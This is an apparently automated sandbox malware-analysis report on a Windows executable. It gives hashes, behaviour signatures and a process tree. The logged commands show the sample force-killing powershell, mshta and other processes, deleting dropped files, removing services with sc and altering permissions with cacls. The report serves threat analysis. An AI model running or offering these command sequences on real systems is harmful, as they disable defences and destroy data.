Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 13:35
Static task
static1
General
-
Target
a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
-
Size
372KB
-
MD5
6fcf1c2c331be34cf85ac994d5036359
-
SHA1
b776b975854a59862a16f8042353ae71554bdd3a
-
SHA256
a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6
-
SHA512
8338ed9d3a81716cab30da8b9a3a0e6e8ea876a668e1839edcf7b5f2a9632f93336142a9e4563d418fa1d176114f500476a33637bf8cad3c180a81e421d9581c
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
sqlageatc.exepid process 1064 sqlageatc.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/2496-115-0x00000000022C0000-0x00000000022CB000-memory.dmp upx behavioral1/memory/2496-118-0x00000000022C0000-0x00000000022CB000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe upx C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe upx -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2820 taskkill.exe 3844 taskkill.exe 2820 taskkill.exe 4776 taskkill.exe 3204 taskkill.exe 3488 taskkill.exe 1908 taskkill.exe 3416 taskkill.exe 1480 taskkill.exe 1816 taskkill.exe 596 taskkill.exe 4580 taskkill.exe 4828 taskkill.exe 708 taskkill.exe 4680 taskkill.exe 3652 taskkill.exe 4532 taskkill.exe 2352 taskkill.exe 3944 taskkill.exe 4504 taskkill.exe 2348 taskkill.exe 1536 taskkill.exe 4948 taskkill.exe 4816 taskkill.exe 1304 taskkill.exe 1288 taskkill.exe 372 taskkill.exe 4436 taskkill.exe 1316 taskkill.exe 4200 taskkill.exe 4660 taskkill.exe 1988 taskkill.exe 4832 taskkill.exe 4500 taskkill.exe 2284 taskkill.exe 4252 taskkill.exe 3960 taskkill.exe 3500 taskkill.exe 2640 taskkill.exe 4848 taskkill.exe 1272 taskkill.exe 4064 taskkill.exe 2972 taskkill.exe 1168 taskkill.exe 3456 taskkill.exe 4260 taskkill.exe 2872 taskkill.exe 2900 taskkill.exe 3780 taskkill.exe 2972 taskkill.exe 3552 taskkill.exe 4300 taskkill.exe 1380 taskkill.exe 4664 taskkill.exe 4960 taskkill.exe 1700 taskkill.exe 1752 taskkill.exe 5048 taskkill.exe 4528 taskkill.exe 3944 taskkill.exe 4824 taskkill.exe 400 taskkill.exe 4328 taskkill.exe 3740 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exepid process 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 708 taskkill.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 3488 taskkill.exe Token: SeDebugPrivilege 400 taskkill.exe Token: SeDebugPrivilege 2868 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 2640 taskkill.exe Token: SeDebugPrivilege 2972 taskkill.exe Token: SeDebugPrivilege 596 taskkill.exe Token: SeDebugPrivilege 4064 taskkill.exe Token: SeDebugPrivilege 2764 taskkill.exe Token: SeDebugPrivilege 372 taskkill.exe Token: SeDebugPrivilege 2144 taskkill.exe Token: SeDebugPrivilege 3652 taskkill.exe Token: SeDebugPrivilege 2820 Conhost.exe Token: SeDebugPrivilege 1204 taskkill.exe Token: SeDebugPrivilege 3552 taskkill.exe Token: SeDebugPrivilege 4436 Conhost.exe Token: SeDebugPrivilege 4532 taskkill.exe Token: SeDebugPrivilege 4504 taskkill.exe Token: SeDebugPrivilege 4580 taskkill.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeDebugPrivilege 4664 taskkill.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeDebugPrivilege 4328 taskkill.exe Token: SeDebugPrivilege 4500 taskkill.exe Token: SeDebugPrivilege 1184 taskkill.exe Token: SeDebugPrivilege 4828 cmd.exe Token: SeDebugPrivilege 2284 Conhost.exe Token: SeDebugPrivilege 1168 taskkill.exe Token: SeDebugPrivilege 2972 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 4960 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 1700 taskkill.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeDebugPrivilege 4300 taskkill.exe Token: SeDebugPrivilege 2352 taskkill.exe Token: SeDebugPrivilege 1908 taskkill.exe Token: SeDebugPrivilege 3740 taskkill.exe Token: SeDebugPrivilege 3456 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 5048 taskkill.exe Token: SeDebugPrivilege 4252 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 4528 taskkill.exe Token: SeDebugPrivilege 4180 taskkill.exe Token: SeDebugPrivilege 4200 taskkill.exe Token: SeDebugPrivilege 4784 taskkill.exe Token: SeDebugPrivilege 4648 taskkill.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeDebugPrivilege 3944 taskkill.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeDebugPrivilege 3416 taskkill.exe Token: SeDebugPrivilege 4260 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 3844 taskkill.exe Token: SeDebugPrivilege 4816 taskkill.exe Token: SeDebugPrivilege 2872 taskkill.exe Token: SeDebugPrivilege 5084 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exepid process 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2496 wrote to memory of 3416 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3416 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3416 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 3416 wrote to memory of 708 3416 cmd.exe taskkill.exe PID 3416 wrote to memory of 708 3416 cmd.exe taskkill.exe PID 3416 wrote to memory of 708 3416 cmd.exe taskkill.exe PID 2496 wrote to memory of 3824 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3824 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3824 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 3824 wrote to memory of 3204 3824 cmd.exe taskkill.exe PID 3824 wrote to memory of 3204 3824 cmd.exe taskkill.exe PID 3824 wrote to memory of 3204 3824 cmd.exe taskkill.exe PID 2496 wrote to memory of 3192 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3192 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3192 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 3192 wrote to memory of 3488 3192 cmd.exe taskkill.exe PID 3192 wrote to memory of 3488 3192 cmd.exe taskkill.exe PID 3192 wrote to memory of 3488 3192 cmd.exe taskkill.exe PID 2496 wrote to memory of 3808 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3808 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3808 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3996 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3996 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3996 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3336 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3336 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3336 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3284 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3284 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3284 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1200 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1200 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1200 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 1200 wrote to memory of 400 1200 cmd.exe taskkill.exe PID 1200 wrote to memory of 400 1200 cmd.exe taskkill.exe PID 1200 wrote to memory of 400 1200 cmd.exe taskkill.exe PID 2496 wrote to memory of 1696 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1696 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1696 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3188 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3188 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 3188 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1140 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1140 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1140 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1228 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1228 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1228 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1428 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1428 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1428 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 1428 wrote to memory of 2868 1428 cmd.exe taskkill.exe PID 1428 wrote to memory of 2868 1428 cmd.exe taskkill.exe PID 1428 wrote to memory of 2868 1428 cmd.exe taskkill.exe PID 2496 wrote to memory of 1780 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1780 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 1780 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 1780 wrote to memory of 1988 1780 cmd.exe taskkill.exe PID 1780 wrote to memory of 1988 1780 cmd.exe taskkill.exe PID 1780 wrote to memory of 1988 1780 cmd.exe taskkill.exe PID 2496 wrote to memory of 2164 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 2164 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2496 wrote to memory of 2164 2496 a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe cmd.exe PID 2164 wrote to memory of 2640 2164 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe"C:\Users\Admin\AppData\Local\Temp\a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im exp1orer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im exp1orer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im expl0rer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im expl0rer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im mshta.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mshta.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im powershell.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskger.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskger.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
